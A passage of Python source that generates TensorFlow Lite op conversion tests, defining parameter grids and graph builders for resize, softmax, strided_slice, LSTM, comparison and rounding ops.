parameters["dtype"], shape=None, min_value=-1, max_value=0))
return input_values, sess.run(
outputs, feed_dict=dict(zip(inputs, input_values)))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_resize_bilinear_tests(options):
"""Make a set of tests to do resize_bilinear."""
test_parameters = [{
"dtype": [tf.float32, tf.int32],
"input_shape": [[1, 3, 4, 3], [1, 10, 2, 1]],
"size": [[1, 1], [4, 3], [2, 2], [5, 6]],
"align_corners": [None, True, False],
}]
def build_graph(parameters):
input_tensor = tf.placeholder(dtype=parameters["dtype"], name="input",
shape=parameters["input_shape"])
out = tf.image.resize_bilinear(input_tensor, size=parameters["size"],
align_corners=parameters["align_corners"])
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_values = create_tensor_data(parameters["dtype"],
parameters["input_shape"])
return [input_values], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_values])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_resize_nearest_neighbor_tests(options):
"""Make a set of tests to do resize_nearest_neighbor."""
test_parameters = [{
"dtype": [tf.float32, tf.int32],
"input_shape": [[1, 3, 4, 3], [1, 10, 2, 1]],
"size": [[1, 1], [4, 3], [2, 2], [5, 6]],
"align_corners": [False],
}]
def build_graph(parameters):
input_tensor = tf.placeholder(
dtype=parameters["dtype"],
name="input",
shape=parameters["input_shape"])
out = tf.image.resize_nearest_neighbor(
input_tensor,
size=parameters["size"],
align_corners=parameters["align_corners"])
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_values = create_tensor_data(parameters["dtype"],
parameters["input_shape"])
return [input_values], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_values])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_sigmoid_tests(options):
"""Make a set of tests to do sigmoid."""
test_parameters = [{
"dtype": [tf.float32],
"input_shape": [[1, 3, 4, 3], [4], [], [1, 2, 3, 4, 5, 6]],
}]
def build_graph(parameters):
input_tensor = tf.placeholder(dtype=parameters["dtype"], name="input",
shape=parameters["input_shape"])
out = tf.sigmoid(input_tensor)
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_values = create_tensor_data(parameters["dtype"],
parameters["input_shape"])
return [input_values], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_values])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_softmax_tests(options):
"""Make a set of tests to do softmax."""
test_parameters = [{
"dtype": [tf.float32],
"input_shape": [[1, 3, 4, 3], [2, 3]],
"dim": [-1, 0],
}, {
"dtype": [tf.float32],
"input_shape": [[4, 7]],
"dim": [-1, 1],
}]
def build_graph(parameters):
input_tensor = tf.placeholder(dtype=parameters["dtype"], name="input",
shape=parameters["input_shape"])
out = tf.nn.softmax(input_tensor, dim=parameters["dim"])
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_values = create_tensor_data(parameters["dtype"],
parameters["input_shape"])
return [input_values], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_values])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_space_to_depth_tests(options):
"""Make a set of tests to do space_to_depth."""
test_parameters = [{
"dtype": [tf.float32, tf.int32, tf.uint8, tf.int64],
"input_shape": [[2, 12, 24, 1]],
"block_size": [2, 3, 4],
}]
def build_graph(parameters):
input_tensor = tf.placeholder(dtype=parameters["dtype"], name="input",
shape=parameters["input_shape"])
out = tf.space_to_depth(input_tensor, block_size=parameters["block_size"])
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_values = create_tensor_data(parameters["dtype"],
parameters["input_shape"])
return [input_values], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_values])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_space_to_batch_nd_tests(options):
"""Make a set of tests to do space_to_batch_nd."""
# TODO(nupurgarg): Add test for uint8.
test_parameters = [
{
"dtype": [tf.int32, tf.int64, tf.float32],
"input_shape": [[1, 2, 2, 3], [2, 2, 4, 1]],
"block_shape": [[1, 3], [2, 2]],
"paddings": [[[0, 0], [0, 0]], [[0, 0], [2, 0]], [[1, 1], [1, 1]]],
"constant_block_shape": [True, False],
"constant_paddings": [True, False],
},
{
"dtype": [tf.float32],
"input_shape": [[2, 3, 7, 3]],
"block_shape": [[1, 3], [2, 2]],
"paddings": [[[0, 0], [2, 0]], [[1, 0], [1, 0]]],
"constant_block_shape": [True, False],
"constant_paddings": [True, False],
},
# Non-4D use case: 1 bath dimension, 3 spatial dimensions, 2 others.
{
"dtype": [tf.float32],
"input_shape": [[1, 4, 4, 4, 1, 1]],
"block_shape": [[2, 2, 2]],
"paddings": [[[0, 0], [0, 0], [0, 0]]],
"constant_block_shape": [True, False],
"constant_paddings": [True, False],
},
]
def build_graph(parameters):
"""Build a space_to_batch graph given `parameters`."""
input_tensor = tf.placeholder(
dtype=parameters["dtype"],
name="input",
shape=parameters["input_shape"])
input_tensors = [input_tensor]
# Get block_shape either as a const or as a placeholder (tensor).
if parameters["constant_block_shape"]:
block_shape = parameters["block_shape"]
else:
shape = [len(parameters["block_shape"])]
block_shape = tf.placeholder(dtype=tf.int32, name="shape", shape=shape)
input_tensors.append(block_shape)
# Get paddings either as a const or as a placeholder (tensor).
if parameters["constant_paddings"]:
paddings = parameters["paddings"]
else:
shape = [len(parameters["paddings"]), 2]
paddings = tf.placeholder(dtype=tf.int32, name="paddings", shape=shape)
input_tensors.append(paddings)
out = tf.space_to_batch_nd(input_tensor, block_shape, paddings)
return input_tensors, [out]
def build_inputs(parameters, sess, inputs, outputs):
values = [
create_tensor_data(parameters["dtype"], parameters["input_shape"])
]
if not parameters["constant_block_shape"]:
values.append(np.array(parameters["block_shape"]))
if not parameters["constant_paddings"]:
values.append(np.array(parameters["paddings"]))
return values, sess.run(outputs, feed_dict=dict(zip(inputs, values)))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=56)
@register_make_test_function()
def make_batch_to_space_nd_tests(options):
"""Make a set of tests to do batch_to_space_nd."""
test_parameters = [
{
"dtype": [tf.float32, tf.int64, tf.int32],
"input_shape": [[12, 3, 3, 1]],
"block_shape": [[1, 4], [2, 2], [3, 4]],
"crops": [[[0, 0], [0, 0]], [[1, 1], [1, 1]]],
"constant_block_shape": [True, False],
"constant_crops": [True, False],
},
# Non-4D use case: 1 bath dimension, 3 spatial dimensions, 2 others.
{
"dtype": [tf.float32],
"input_shape": [[8, 2, 2, 2, 1, 1]],
"block_shape": [[2, 2, 2]],
"crops": [[[0, 0], [0, 0], [0, 0]]],
"constant_block_shape": [True, False],
"constant_crops": [True, False],
},
]
def build_graph(parameters):
"""Build a batch_to_space graph given `parameters`."""
input_tensor = tf.placeholder(
dtype=parameters["dtype"],
name="input",
shape=parameters["input_shape"])
input_tensors = [input_tensor]
# Get block_shape either as a const or as a placeholder (tensor).
if parameters["constant_block_shape"]:
block_shape = parameters["block_shape"]
else:
shape = [len(parameters["block_shape"])]
block_shape = tf.placeholder(dtype=tf.int32, name="shape", shape=shape)
input_tensors.append(block_shape)
# Get crops either as a const or as a placeholder (tensor).
if parameters["constant_crops"]:
crops = parameters["crops"]
else:
shape = [len(parameters["crops"]), 2]
crops = tf.placeholder(dtype=tf.int32, name="crops", shape=shape)
input_tensors.append(crops)
out = tf.batch_to_space_nd(input_tensor, block_shape, crops)
return input_tensors, [out]
def build_inputs(parameters, sess, inputs, outputs):
values = [
create_tensor_data(parameters["dtype"], parameters["input_shape"])
]
if not parameters["constant_block_shape"]:
values.append(np.array(parameters["block_shape"]))
if not parameters["constant_crops"]:
values.append(np.array(parameters["crops"]))
return values, sess.run(outputs, feed_dict=dict(zip(inputs, values)))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_transpose_tests(options):
"""Make a set of tests to do transpose."""
# TODO(nupurgarg): Add test for uint8.
test_parameters = [{
"dtype": [tf.int32, tf.int64, tf.float32],
"input_shape": [[2, 2, 3]],
"perm": [[0, 1, 2], [0, 2, 1]],
"constant_perm": [True, False],
}, {
"dtype": [tf.float32],
"input_shape": [[1, 2, 3, 4]],
"perm": [[0, 1, 2, 3], [3, 0, 1, 2]],
"constant_perm": [True, False],
}, {
"dtype": [tf.float32],
"input_shape": [[1, 2, 3, 4, 5]],
"perm": [[4, 3, 2, 1, 0]],
"constant_perm": [True, False],
}]
def build_graph(parameters):
"""Build a transpose graph given `parameters`."""
input_tensor = tf.placeholder(
dtype=parameters["dtype"],
name="input",
shape=parameters["input_shape"])
if parameters["constant_perm"]:
perm = parameters["perm"]
input_tensors = [input_tensor]
else:
shape = [len(parameters["perm"]), 2]
perm = tf.placeholder(dtype=tf.int32, name="perm", shape=shape)
input_tensors = [input_tensor, perm]
out = tf.transpose(input_tensor, perm=perm)
return input_tensors, [out]
def build_inputs(parameters, sess, inputs, outputs):
values = [
create_tensor_data(parameters["dtype"], parameters["input_shape"])
]
if not parameters["constant_perm"]:
values.append(np.array(parameters["perm"]))
return values, sess.run(outputs, feed_dict=dict(zip(inputs, values)))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=9)
@register_make_test_function()
def make_squeeze_tests(options):
"""Make a set of tests to do squeeze."""
test_parameters = [{
"dtype": [tf.int32, tf.float32, tf.int64],
"input_shape": [[1, 2, 1, 3, 1, 4, 1, 1]],
"axis": [
None, [], [0, 2], [4, 7], [-1, 0, 2, 0, 7, -6], [1], [2, 3, 2],
[-1, -2, -4, -6, -8], [0, 2, 4, 6, 7], [7, 6, 4, 2, 0], [6, 6],
[0, 1, 2, 3, 4, 5, 6, 7], [-2, -3, 1, 0, 7, -5]
],
}, {
"dtype": [tf.int32, tf.float32, tf.int64],
"input_shape": [[1]],
"axis": [None, [], [0], [-1]],
}, {
"dtype": [tf.int32, tf.float32, tf.int64],
"input_shape": [[1, 1, 1, 1, 1]],
"axis": [None, [], [0], [3, 0], [-2, 0, 3, 2]],
}]
def build_graph(parameters):
input_tensor = tf.placeholder(
dtype=parameters["dtype"],
name="input",
shape=parameters["input_shape"])
out = tf.squeeze(input_tensor, axis=parameters["axis"])
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_values = create_tensor_data(parameters["dtype"],
parameters["input_shape"])
return [input_values], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_values])))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=12)
@register_make_test_function()
def make_squeeze_transpose_tests(options):
"""Make a set of tests to do squeeze followed by transpose."""
test_parameters = [{
"dtype": [tf.int32, tf.float32, tf.int64],
"input_shape": [[1, 4, 10, 1]],
"axis": [[-1], [3]],
}]
def build_graph(parameters):
input_tensor = tf.placeholder(
dtype=parameters["dtype"],
name="input",
shape=parameters["input_shape"])
out = tf.squeeze(input_tensor, axis=parameters["axis"])
out = tf.transpose(out, perm=[1, 2])
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_values = create_tensor_data(parameters["dtype"],
parameters["input_shape"])
return [input_values], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_values])))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=0)
def _make_strided_slice_tests(options, test_parameters,
expected_tf_failures=0):
"""Utility function to make strided_slice_tests based on parameters."""
def build_graph(parameters):
"""Build graph for stride_slice test."""
input_tensor = tf.placeholder(
dtype=parameters["dtype"],
name="input",
shape=parameters["input_shape"])
if parameters["constant_indices"]:
begin = parameters["begin"]
end = parameters["end"]
strides = parameters["strides"]
tensors = [input_tensor]
else:
begin = tf.placeholder(
dtype=parameters["index_type"],
name="begin",
shape=[len(parameters["input_shape"])])
end = tf.placeholder(
dtype=parameters["index_type"],
name="end",
shape=[len(parameters["input_shape"])])
strides = (
tf.placeholder(
dtype=parameters["index_type"],
name="strides",
shape=[len(parameters["input_shape"])])
if parameters["strides"] is not None else None)
tensors = [input_tensor, begin, end]
if strides is not None:
tensors.append(strides)
out = tf.strided_slice(
input_tensor,
begin,
end,
strides,
begin_mask=parameters["begin_mask"],
end_mask=parameters["end_mask"])
return tensors, [out]
def build_inputs(parameters, sess, inputs, outputs):
"""Build inputs for stride_slice test."""
input_values = create_tensor_data(parameters["dtype"],
parameters["input_shape"])
index_type = _TF_TYPE_INFO[parameters["index_type"]][0]
values = [input_values]
if not parameters["constant_indices"]:
begin_values = np.array(parameters["begin"]).astype(index_type)
end_values = np.array(parameters["end"]).astype(index_type)
stride_values = (
np.array(parameters["strides"]).astype(index_type)
if parameters["strides"] is not None else None)
values.append(begin_values)
values.append(end_values)
if stride_values is not None:
values.append(stride_values)
return values, sess.run(outputs, feed_dict=dict(zip(inputs, values)))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=expected_tf_failures)
@register_make_test_function()
def make_strided_slice_tests(options):
"""Make a set of tests to do strided_slice."""
# TODO(soroosh): add test/support for uint8.
test_parameters = [
# 4-D (basic cases with const/non-const indices).
{
"dtype": [tf.float32, tf.int32, tf.int64],
"index_type": [tf.int32],
"input_shape": [[12, 2, 2, 5]],
"strides": [None, [2, 1, 3, 1]],
"begin": [[0, 0, 0, 0]],
"end": [[12, 2, 2, 5]],
"begin_mask": [None],
"end_mask": [None],
"shrink_axis_mask": [None],
"constant_indices": [False, True],
},
# 4-D with non-trivial begin & end.
{
"dtype": [tf.float32],
"index_type": [tf.int32],
"input_shape": [[12, 2, 2, 5]],
"begin": [[0, 0, 0, 0], [1, 0, 1, 0]],
"end": [[8, 2, 2, 3], [12, 2, 2, 5]],
"strides": [None, [2, 1, 3, 1]],
"begin_mask": [None, 8],
"end_mask": [None, 3],
"shrink_axis_mask": [None, 15, -1],
"constant_indices": [True],
},
# Begin, end, strides dim are different from input shape
{
"dtype": [tf.float32],
"index_type": [tf.int32],
"input_shape": [[12, 2, 2, 5]],
"begin": [[0]],
"end": [[1]],
"strides": [None, [1]],
"begin_mask": [0],
"end_mask": [0],
"shrink_axis_mask": [1],
"constant_indices": [True],
},
# 2-D
{
"dtype": [tf.float32],
"index_type": [tf.int32],
"input_shape": [[2, 3]],
"begin": [[0, 0]],
"end": [[2, 2]],
"strides": [None, [2, 2]],
"begin_mask": [None, 1, 2],
"end_mask": [None, 1, 2],
"shrink_axis_mask": [None, 1, 2, 3, -1],
"constant_indices": [False, True],
},
# Negative strides
{
"dtype": [tf.float32],
"index_type": [tf.int32],
"input_shape": [[2, 3]],
"begin": [[0, -1]],
"end": [[2, -3]],
"strides": [[1, -1]],
"begin_mask": [None, 1, 2],
"end_mask": [None, 1, 2],
"shrink_axis_mask": [None, 1, 2, 3, -1],
"constant_indices": [False],
},
]
_make_strided_slice_tests(options, test_parameters, expected_tf_failures=2)
@register_make_test_function()
def make_strided_slice_1d_exhaustive_tests(options):
"""Make a set of exhaustive tests for 1D strided_slice."""
test_parameters = [
# 1-D Exhaustive
{
"dtype": [tf.float32],
"index_type": [tf.int32],
"input_shape": [[3]],
"begin": [[-2], [-1], [0], [1], [2]],
"end": [[-2], [-1], [0], [1], [2]],
"strides": [[-2], [-1], [1], [2]],
"begin_mask": [0, 1],
"end_mask": [0, 1],
"shrink_axis_mask": [0],
"constant_indices": [False],
},
]
_make_strided_slice_tests(options, test_parameters)
# For verifying https://github.com/tensorflow/tensorflow/issues/23599
# TODO(chaomei): refactor the test to cover more cases, like negative stride,
# negative array index etc.
@register_make_test_function()
def make_resolve_constant_strided_slice_tests(options):
"""Make a set of tests to show strided_slice yields incorrect results."""
test_parameters = [{
"unused_iteration_counter": [1],
}]
def build_graph(parameters):
"""Build the strided_slice op testing graph."""
del parameters
input_values = tf.placeholder(dtype=tf.float32, shape=[4, 2])
data = tf.constant([[0, 1, 2, 3],
[4, 5, 6, 7],
[8, 9, 10, 11],
[12, 13, 14, 15]], tf.float32)
return [input_values], [input_values + data[:, :2]]
def build_inputs(parameters, sess, inputs, outputs):
del parameters
input_values = np.zeros([4, 2], dtype=np.float32)
return [input_values], sess.run(
outputs, feed_dict={inputs[0]: input_values})
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_lstm_tests(options):
"""Make a set of tests to do basic Lstm cell."""
test_parameters = [
{
"dtype": [tf.float32],
"num_batchs": [1],
"time_step_size": [1],
"input_vec_size": [3],
"num_cells": [4],
"split_tflite_lstm_inputs": [False],
},
]
def build_graph(parameters):
"""Build a simple graph with BasicLSTMCell."""
num_batchs = parameters["num_batchs"]
time_step_size = parameters["time_step_size"]
input_vec_size = parameters["input_vec_size"]
num_cells = parameters["num_cells"]
inputs_after_split = []
for i in xrange(time_step_size):
one_timestamp_input = tf.placeholder(
dtype=parameters["dtype"],
name="split_{}".format(i),
shape=[num_batchs, input_vec_size])
inputs_after_split.append(one_timestamp_input)
# Currently lstm identifier has a few limitations: only supports
# forget_bias == 0, inner state activation == tanh.
# TODO(zhixianyan): Add another test with forget_bias == 1.
# TODO(zhixianyan): Add another test with relu as activation.
lstm_cell = tf.contrib.rnn.BasicLSTMCell(
num_cells, forget_bias=0.0, state_is_tuple=True)
cell_outputs, _ = rnn.static_rnn(
lstm_cell, inputs_after_split, dtype=tf.float32)
out = cell_outputs[-1]
return inputs_after_split, [out]
def build_inputs(parameters, sess, inputs, outputs):
"""Feed inputs, assign variables, and freeze graph."""
with tf.variable_scope("", reuse=True):
kernel = tf.get_variable("rnn/basic_lstm_cell/kernel")
bias = tf.get_variable("rnn/basic_lstm_cell/bias")
kernel_values = create_tensor_data(
parameters["dtype"], [kernel.shape[0], kernel.shape[1]], -1, 1)
bias_values = create_tensor_data(parameters["dtype"], [bias.shape[0]], 0,
1)
sess.run(tf.group(kernel.assign(kernel_values), bias.assign(bias_values)))
num_batchs = parameters["num_batchs"]
time_step_size = parameters["time_step_size"]
input_vec_size = parameters["input_vec_size"]
input_values = []
for _ in xrange(time_step_size):
tensor_data = create_tensor_data(parameters["dtype"],
[num_batchs, input_vec_size], 0, 1)
input_values.append(tensor_data)
out = sess.run(outputs, feed_dict=dict(zip(inputs, input_values)))
return input_values, out
# TODO(zhixianyan): Automatically generate rnn_states for lstm cell.
extra_toco_options = ExtraTocoOptions()
extra_toco_options.rnn_states = (
"{state_array:rnn/BasicLSTMCellZeroState/zeros,"
"back_edge_source_array:rnn/basic_lstm_cell/Add_1,size:4},"
"{state_array:rnn/BasicLSTMCellZeroState/zeros_1,"
"back_edge_source_array:rnn/basic_lstm_cell/Mul_2,size:4}")
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
extra_toco_options,
use_frozen_graph=True)
def make_l2_pool(input_tensor, ksize, strides, padding, data_format):
"""Given an input perform a sequence of TensorFlow ops to produce l2pool."""
return tf.sqrt(tf.nn.avg_pool(
tf.square(input_tensor), ksize=ksize, strides=strides,
padding=padding, data_format=data_format))
@register_make_test_function()
def make_topk_tests(options):
"""Make a set of tests to do topk."""
test_parameters = [{
"input_dtype": [tf.float32, tf.int32],
"input_shape": [[10], [5, 20]],
"input_k": [None, 1, 3],
}]
def build_graph(parameters):
"""Build the topk op testing graph."""
input_value = tf.placeholder(
dtype=parameters["input_dtype"],
name="input",
shape=parameters["input_shape"])
if parameters["input_k"] is not None:
k = tf.placeholder(dtype=tf.int32, name="input_k", shape=[])
inputs = [input_value, k]
else:
k = tf.constant(3, name="k")
inputs = [input_value]
out = tf.nn.top_k(input_value, k)
return inputs, [out[1]]
def build_inputs(parameters, sess, inputs, outputs):
input_value = create_tensor_data(parameters["input_dtype"],
parameters["input_shape"])
if parameters["input_k"] is not None:
k = np.array(parameters["input_k"], dtype=np.int32)
return [input_value, k], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_value, k])))
else:
return [input_value], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_value])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_arg_min_max_tests(options):
"""Make a set of tests to do arg_max."""
test_parameters = [{
"input_dtype": [tf.float32, tf.int32],
"input_shape": [[], [1, 1, 1, 3], [2, 3, 4, 5], [2, 3, 3], [5, 5], [10]],
"output_type": [tf.int32, tf.int64],
"is_arg_max": [True],
}]
def build_graph(parameters):
"""Build the topk op testing graph."""
input_value = tf.placeholder(
dtype=parameters["input_dtype"],
name="input",
shape=parameters["input_shape"])
axis = random.randint(0, max(len(parameters["input_shape"]) - 1, 0))
if parameters["is_arg_max"]:
out = tf.arg_max(input_value, axis, output_type=parameters["output_type"])
else:
out = tf.arg_min(input_value, axis, output_type=parameters["output_type"])
return [input_value], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_value = create_tensor_data(parameters["input_dtype"],
parameters["input_shape"])
return [input_value], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_value])))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=4)
@register_make_test_function()
def make_equal_tests(options):
"""Make a set of tests to do equal."""
test_parameters = [{
"input_dtype": [tf.float32, tf.int32, tf.int64],
"input_shape_pair": [([], []),
([1, 1, 1, 3], [1, 1, 1, 3]),
([2, 3, 4, 5], [2, 3, 4, 5]), ([2, 3, 3], [2, 3]),
([5, 5], [1]), ([10], [2, 4, 10])],
}]
def build_graph(parameters):
"""Build the equal op testing graph."""
input_value1 = tf.placeholder(
dtype=parameters["input_dtype"],
name="input1",
shape=parameters["input_shape_pair"][0])
input_value2 = tf.placeholder(
dtype=parameters["input_dtype"],
name="input2",
shape=parameters["input_shape_pair"][1])
out = tf.equal(input_value1, input_value2)
return [input_value1, input_value2], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_value1 = create_tensor_data(parameters["input_dtype"],
parameters["input_shape_pair"][0])
input_value2 = create_tensor_data(parameters["input_dtype"],
parameters["input_shape_pair"][1])
return [input_value1, input_value2], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_value1, input_value2])))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=3)
@register_make_test_function()
def make_not_equal_tests(options):
"""Make a set of tests to do not equal."""
test_parameters = [{
"input_dtype": [tf.float32, tf.int32, tf.int64],
"input_shape_pair": [([1, 1, 1, 3], [1, 1, 1, 3]),
([2, 3, 4, 5], [2, 3, 4, 5]), ([2, 3, 3], [2, 3]),
([5, 5], [1]), ([10], [2, 4, 10])],
}]
def build_graph(parameters):
"""Build the not euqal op testing graph."""
input_value1 = tf.placeholder(
dtype=parameters["input_dtype"],
name="input1",
shape=parameters["input_shape_pair"][0])
input_value2 = tf.placeholder(
dtype=parameters["input_dtype"],
name="input2",
shape=parameters["input_shape_pair"][1])
out = tf.not_equal(input_value1, input_value2)
return [input_value1, input_value2], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_value1 = create_tensor_data(parameters["input_dtype"],
parameters["input_shape_pair"][0])
input_value2 = create_tensor_data(parameters["input_dtype"],
parameters["input_shape_pair"][1])
return [input_value1, input_value2], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_value1, input_value2])))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=3)
@register_make_test_function()
def make_greater_tests(options):
"""Make a set of tests to do greater."""
test_parameters = [{
"input_dtype": [tf.float32, tf.int32, tf.int64],
"input_shape_pair": [([1, 1, 1, 3], [1, 1, 1, 3]),
([2, 3, 4, 5], [2, 3, 4, 5]), ([2, 3, 3], [2, 3]),
([5, 5], [1]), ([10], [2, 4, 10])],
}]
def build_graph(parameters):
"""Build the greater op testing graph."""
input_value1 = tf.placeholder(
dtype=parameters["input_dtype"],
name="input1",
shape=parameters["input_shape_pair"][0])
input_value2 = tf.placeholder(
dtype=parameters["input_dtype"],
name="input2",
shape=parameters["input_shape_pair"][1])
out = tf.greater(input_value1, input_value2)
return [input_value1, input_value2], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_value1 = create_tensor_data(parameters["input_dtype"],
parameters["input_shape_pair"][0])
input_value2 = create_tensor_data(parameters["input_dtype"],
parameters["input_shape_pair"][1])
return [input_value1, input_value2], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_value1, input_value2])))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=3)
@register_make_test_function()
def make_greater_equal_tests(options):
"""Make a set of tests to do greater_equal."""
test_parameters = [{
"input_dtype": [tf.float32, tf.int32, tf.int64],
"input_shape_pair": [([1, 1, 1, 3], [1, 1, 1, 3]),
([2, 3, 4, 5], [2, 3, 4, 5]), ([2, 3, 3], [2, 3]),
([5, 5], [1]), ([10], [2, 4, 10])],
}]
def build_graph(parameters):
"""Build the greater_equal op testing graph."""
input_value1 = tf.placeholder(
dtype=parameters["input_dtype"],
name="input1",
shape=parameters["input_shape_pair"][0])
input_value2 = tf.placeholder(
dtype=parameters["input_dtype"],
name="input2",
shape=parameters["input_shape_pair"][1])
out = tf.greater_equal(input_value1, input_value2)
return [input_value1, input_value2], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_value1 = create_tensor_data(parameters["input_dtype"],
parameters["input_shape_pair"][0])
input_value2 = create_tensor_data(parameters["input_dtype"],
parameters["input_shape_pair"][1])
return [input_value1, input_value2], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_value1, input_value2])))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=3)
@register_make_test_function()
def make_less_tests(options):
"""Make a set of tests to do less."""
test_parameters = [{
"input_dtype": [tf.float32, tf.int32, tf.int64],
"input_shape_pair": [([1, 1, 1, 3], [1, 1, 1, 3]),
([2, 3, 4, 5], [2, 3, 4, 5]), ([2, 3, 3], [2, 3]),
([5, 5], [1]), ([10], [2, 4, 10])],
}]
def build_graph(parameters):
"""Build the less op testing graph."""
input_value1 = tf.placeholder(
dtype=parameters["input_dtype"],
name="input1",
shape=parameters["input_shape_pair"][0])
input_value2 = tf.placeholder(
dtype=parameters["input_dtype"],
name="input2",
shape=parameters["input_shape_pair"][1])
out = tf.less(input_value1, input_value2)
return [input_value1, input_value2], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_value1 = create_tensor_data(parameters["input_dtype"],
parameters["input_shape_pair"][0])
input_value2 = create_tensor_data(parameters["input_dtype"],
parameters["input_shape_pair"][1])
return [input_value1, input_value2], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_value1, input_value2])))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=3)
@register_make_test_function()
def make_less_equal_tests(options):
"""Make a set of tests to do less_equal."""
test_parameters = [{
"input_dtype": [tf.float32, tf.int32, tf.int64],
"input_shape_pair": [([1, 1, 1, 3], [1, 1, 1, 3]),
([2, 3, 4, 5], [2, 3, 4, 5]), ([2, 3, 3], [2, 3]),
([5, 5], [1]), ([10], [2, 4, 10])],
}]
def build_graph(parameters):
"""Build the less_equal op testing graph."""
input_value1 = tf.placeholder(
dtype=parameters["input_dtype"],
name="input1",
shape=parameters["input_shape_pair"][0])
input_value2 = tf.placeholder(
dtype=parameters["input_dtype"],
name="input2",
shape=parameters["input_shape_pair"][1])
out = tf.less_equal(input_value1, input_value2)
return [input_value1, input_value2], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_value1 = create_tensor_data(parameters["input_dtype"],
parameters["input_shape_pair"][0])
input_value2 = create_tensor_data(parameters["input_dtype"],
parameters["input_shape_pair"][1])
return [input_value1, input_value2], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_value1, input_value2])))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=3)
@register_make_test_function()
def make_floor_tests(options):
"""Make a set of tests to do floor."""
test_parameters = [{
"input_dtype": [tf.float32],
"input_shape": [[], [1], [1, 2], [5, 6, 7, 8], [3, 4, 5, 6]],
}]
def build_graph(parameters):
"""Build the floor op testing graph."""
input_value = tf.placeholder(
dtype=parameters["input_dtype"],
name="input1",
shape=parameters["input_shape"])
out = tf.floor(input_value)
return [input_value], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_value = create_tensor_data(parameters["input_dtype"],
parameters["input_shape"])
return [input_value], sess.run(outputs, feed_dict={inputs[0]: input_value})
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_ceil_tests(options):
"""Make a set of tests to do ceil."""
test_parameters = [{
"input_dtype": [tf.float32],
"input_shape": [[], [1], [1, 2], [5, 6, 7, 8], [3, 4, 5, 6]],
}]
def build_graph(parameters):
"""Build the ceil op testing graph."""
input_value = tf.placeholder(
dtype=parameters["input_dtype"],
name="input1",
shape=parameters["input_shape"])
out = tf.ceil(input_value)
return [input_value], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_value = create_tensor_data(parameters["input_dtype"],
parameters["input_shape"])
return [input_value], sess.run(
outputs, feed_dict={inputs[0]: input_value})
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_round_tests(options):
"""Build the round op testing graph."""
test_parameters = [{
"input_dtype": [tf.float32],
"input_shape": [[], [1], [1, 2], [5, 6, 7, 8], [3, 4, 5, 6]],
}]
def build_graph(parameters):
"""Build the round op testing graph."""
input_value = tf.placeholder(
dtype=parameters["input_dtype"],
name="input1",
shape=parameters["input_shape"])
out = tf.round(input_value)
return [input_value], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_value = create_tensor_data(parameters["input_dtype"],
parameters["input_shape"])
return [input_value], sess.run(outputs, feed_dict={inputs[0]: input_value})
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_neg_tests(options):
"""Make a set of tests to do neg."""
test_parameters = [{
